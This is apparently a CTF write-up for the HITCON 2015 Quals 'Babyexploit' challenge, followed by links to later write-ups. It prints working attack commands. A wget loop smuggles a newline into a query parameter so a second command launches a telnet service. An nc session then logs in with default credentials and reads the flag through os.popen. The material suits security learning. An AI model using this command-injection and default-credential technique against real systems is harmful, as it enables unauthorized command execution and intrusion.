HITCON 2015 Quals: Babyexploit

Reading time ~1 minute

This challenge was solved by one of my teammates, nguyen and me and the write up was written by me.

Run this on one thread:

while true; do wget -qO- "http://52.68.245.164/?args[]=abc%0a&args[]=twistd&args[]=telnet" > /dev/null; done

This works because $ in regex allows \n too (\Z would not allow this), so it will run the following commands:

/bin/orange abc
twistd telnet

Connect on another thread: nc 52.68.245.164 4040 (this is the port of the twistd telnet service), user/pass: admin/changeme (default credentials) and execute this until you got the flag: import os;print os.popen("/read_flag").read();

python -c "import sys;sys.stdout.write(\"admin\r\nchangeme\r\nimport os;
print '%r'%os.popen('/read_flag').read();\r\n\")"|nc 52.68.245.164 4040

Sometimes you have to try it multiple times, because the process is killed very fast.

HITCON CTF 2019 Quals: Reverse - EmojiVM

This challenge was a VM implemented where every instruction was an emoji. For the first part of the challenge we had to reverse a flag ch...… Continue reading

HITCON CTF 2019 Quals: Reverse - CoreDumb

Published on October 19, 2019

HITCON CTF 2019 Quals: Pwn - Crypto in the shell

Published on October 19, 2019